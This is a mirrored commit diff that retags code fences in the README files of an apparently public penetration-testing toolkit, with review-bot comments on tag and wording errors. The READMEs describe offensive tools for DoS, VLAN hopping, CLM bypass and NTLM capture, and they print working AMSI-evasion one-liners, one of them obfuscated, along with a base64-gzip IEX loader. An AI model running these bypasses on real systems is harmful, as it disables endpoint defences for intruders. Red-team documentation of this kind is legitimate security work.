mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 18:11:37 +01:00
readmes changed
This commit is contained in:
parent
ccf52e3dba
commit
dfaf2ad518
@ -2,7 +2,7 @@
|
|||||||
|
|
||||||
- **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored.
|
- **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
|
c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
|
||||||
|
|
||||||
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
||||||
|
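Review bot: the `powershell` tag on this fence mislabels the sample, which is a cmd.exe session (`c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe`) followed by the tool's own banner output, not PowerShell source. A highlighter will treat the `c:\>` prompt and the `:: tamperUpx - ...` banner as PowerShell tokens; `console`, `text` or `bat` would be the accurate tag. The same `C:\...>` prompt under a `powershell` tag recurs later in this commit in the two generateMSBuildXML.py runs (`C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py ...`) and in the SharpWebServer hunk (`C:\> SharpWebServer.exe port=8888 ...`).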
@ -3,7 +3,7 @@
|
|||||||
- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
|
- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
|
||||||
|
|
||||||
The effect will be similar to:
|
The effect will be similar to:
|
||||||
```
|
```shell
|
||||||
SW2960#show cdp traffic
|
SW2960#show cdp traffic
|
||||||
CDP counters :
|
CDP counters :
|
||||||
Total packets output: 361, Input: 11824
|
Total packets output: 361, Input: 11824
|
||||||
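Review bot: `shell` is the wrong tag for a Cisco IOS CLI transcript. In shell highlighting `#` opens a comment, so the prompt line `SW2960#show cdp traffic` renders as a comment and the `CDP counters :` / `Total packets output: 361, Input: 11824` lines are not shell syntax at all. Leave this fence untagged or use `text`.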
@ -28,7 +28,7 @@ victim's premises or to aid Password-Spraying efforts against exposed OWA
|
|||||||
interface.
|
interface.
|
||||||
|
|
||||||
Sample run:
|
Sample run:
|
||||||
```
|
```powershell
|
||||||
PS D:\> python3 .\exchangeRecon.py 10.10.10.9
|
PS D:\> python3 .\exchangeRecon.py 10.10.10.9
|
||||||
|
|
||||||
:: Exchange Fingerprinter
|
:: Exchange Fingerprinter
|
||||||
@ -136,7 +136,7 @@ TODO:
|
|||||||
- Implement sniffer hunting for used protocols and their auth strings
|
- Implement sniffer hunting for used protocols and their auth strings
|
||||||
- Implement semi-auto mode that is first learning a network, then choosing specific attacks
|
- Implement semi-auto mode that is first learning a network, then choosing specific attacks
|
||||||
|
|
||||||
```
|
```bash
|
||||||
bash $ python RoutingAttackKit.py
|
bash $ python RoutingAttackKit.py
|
||||||
|
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
@ -236,7 +236,7 @@ Capturing on 'eth0'
|
|||||||
|
|
||||||
Sample output:
|
Sample output:
|
||||||
|
|
||||||
```
|
```bash
|
||||||
$ ./VLANHopperDTP.py --help
|
$ ./VLANHopperDTP.py --help
|
||||||
|
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
|
@ -26,7 +26,7 @@ Takes two files on input. Tries to find every line of the second file within the
|
|||||||
|
|
||||||
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
||||||
|
|
||||||
```
|
```bash
|
||||||
user@my-box $ startkali
|
user@my-box $ startkali
|
||||||
[>] Launching kali in headless
|
[>] Launching kali in headless
|
||||||
[>] Awaiting for machine to get up...
|
[>] Awaiting for machine to get up...
|
||||||
|
@ -7,7 +7,7 @@
|
|||||||
- **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ )
|
- **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ )
|
||||||
The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.
|
The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS > $ExecutionContext.SessionState.LanguageMode
|
PS > $ExecutionContext.SessionState.LanguageMode
|
||||||
ConstrainedLanguage
|
ConstrainedLanguage
|
||||||
PS > .\Bypass-CLM.ps1
|
PS > .\Bypass-CLM.ps1
|
||||||
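Review bot: naming mismatch between the description and the sample in this hunk. The prose says the managed assembly switches `SessionData.LanguageMode`, while the sample checks `$ExecutionContext.SessionState.LanguageMode`; if the member the assembly flips lives on the session state, the description should name it that way, otherwise a reader looking for `SessionData` in the source will not find it. Minor: `it's current AppDomain` should be `its current AppDomain`.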
@ -48,7 +48,7 @@ FullLanguage
|
|||||||
|
|
||||||
- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
|
- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
cmstp.exe /ni /s cmstp.inf
|
cmstp.exe /ni /s cmstp.inf
|
||||||
```
|
```
|
||||||
|
|
||||||
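Review bot: the entry is named `cmstp-template.inf`, but the usage line runs `cmstp.exe /ni /s cmstp.inf`. Either change the sample to `cmstp.exe /ni /s cmstp-template.inf` or state that the template has to be saved under the name passed to cmstp; as written the command will fail with a file-not-found unless the reader renames it.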
@ -63,7 +63,7 @@ cmstp.exe /ni /s cmstp.inf
|
|||||||
|
|
||||||
Example:
|
Example:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
|
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
|
||||||
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
|
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
|
||||||
```
|
```
|
||||||
@ -78,7 +78,7 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com
|
|||||||
|
|
||||||
Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
|
Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS > "amsiInitFailed"
|
PS > "amsiInitFailed"
|
||||||
At line:1 char:1
|
At line:1 char:1
|
||||||
+ "amsiInitFailed"
|
+ "amsiInitFailed"
|
||||||
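Review bot: two wording fixes in the description of this hunk: `Since hash-value computation algorithm was open-sources` should read `Since the hash-value computation algorithm was open-sourced`, and `the attacker becomes able to customize hash-lookup scheme the way he likes` reads better as `an attacker can customize the hash-lookup scheme as they like`. The `powershell` tag itself is correct for the `PS > "amsiInitFailed"` sample.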
@ -97,12 +97,12 @@ amsiInitFailed
|
|||||||
|
|
||||||
- OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases:
|
- OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases:
|
||||||
* **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
|
* **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
|
||||||
```
|
```powershell
|
||||||
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes)
|
* **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes)
|
||||||
```
|
```powershell
|
||||||
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -125,7 +125,7 @@ amsiInitFailed
|
|||||||
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
|
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
|
||||||
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
|
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
|
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
|
||||||
Loaded $FileFinderSearchSYSVol results.
|
Loaded $FileFinderSearchSYSVol results.
|
||||||
Loaded $FileFinder results.
|
Loaded $FileFinder results.
|
||||||
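Review bot: the documented cmdlet is `Import-ReconData -DirName <DIR>`, but the sample run calls `Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09`. Unless `Load-ReconData` is an alias exported by the script, one of the two names is wrong; suggest changing the sample to `Import-ReconData` (or documenting the alias next to it) so the README matches what the script actually exposes.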
@ -176,7 +176,7 @@ This script can embed following data within constructed CSharp Task:
|
|||||||
|
|
||||||
Example output **not minimized**:
|
Example output **not minimized**:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
@ -233,7 +233,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
|
|||||||
|
|
||||||
**minimized**
|
**minimized**
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
|
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
|
||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
@ -251,13 +251,13 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
|||||||
|
|
||||||
This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`:
|
This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
|
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
|
||||||
```
|
```
|
||||||
|
|
||||||
or with new version of PowerView coming with it's `Get-DomainOU` cmdlet.
|
or with new version of PowerView coming with it's `Get-DomainOU` cmdlet.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
|
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
|
||||||
+ CONTOSO
|
+ CONTOSO
|
||||||
+ SharedFolders
|
+ SharedFolders
|
||||||
@ -296,7 +296,7 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
|
|||||||
|
|
||||||
- **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound.
|
- **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound.
|
||||||
|
|
||||||
```
|
```bash
|
||||||
$ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
$ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
||||||
[.] Connected to neo4j instance.
|
[.] Connected to neo4j instance.
|
||||||
[.] Marking nodes (0..10) ...
|
[.] Marking nodes (0..10) ...
|
||||||
@ -342,7 +342,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
|||||||
|
|
||||||
- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
|
- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
|
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
|
||||||
|
|
||||||
:: SharpWebServer ::
|
:: SharpWebServer ::
|
||||||
@ -377,7 +377,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
|
|||||||
* The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly
|
* The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly
|
||||||
|
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
||||||
|
|
||||||
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
||||||
|
@ -31,7 +31,7 @@
|
|||||||
|
|
||||||
- **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee))
|
- **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee))
|
||||||
|
|
||||||
```
|
```python
|
||||||
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
||||||
# of a target cryptosystem, by generating set of test cases to fed the cryptosystem with.
|
# of a target cryptosystem, by generating set of test cases to fed the cryptosystem with.
|
||||||
#
|
#
|
||||||
@ -84,7 +84,7 @@ Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4
|
|||||||
|
|
||||||
When `DEBUG` is turned on, the output may also look like:
|
When `DEBUG` is turned on, the output may also look like:
|
||||||
|
|
||||||
```
|
```bash
|
||||||
$ ./reencode.py JTQxJTQxJTQxJTQx
|
$ ./reencode.py JTQxJTQxJTQxJTQx
|
||||||
[.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
[.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
||||||
[.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
[.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
||||||
|
@ -41,7 +41,8 @@ I've experienced following:
|
|||||||
Use `--verbose` for additional _field steps explanation_ output.
|
Use `--verbose` for additional _field steps explanation_ output.
|
||||||
|
|
||||||
Sample usage:
|
Sample usage:
|
||||||
```
|
|
||||||
|
```powershell
|
||||||
PS> python3 rdpFileUpload.py -v -f certutil README.md
|
PS> python3 rdpFileUpload.py -v -f certutil README.md
|
||||||
|
|
||||||
:: RDP file upload utility via Keyboard emulation.
|
:: RDP file upload utility via Keyboard emulation.
|
||||||
|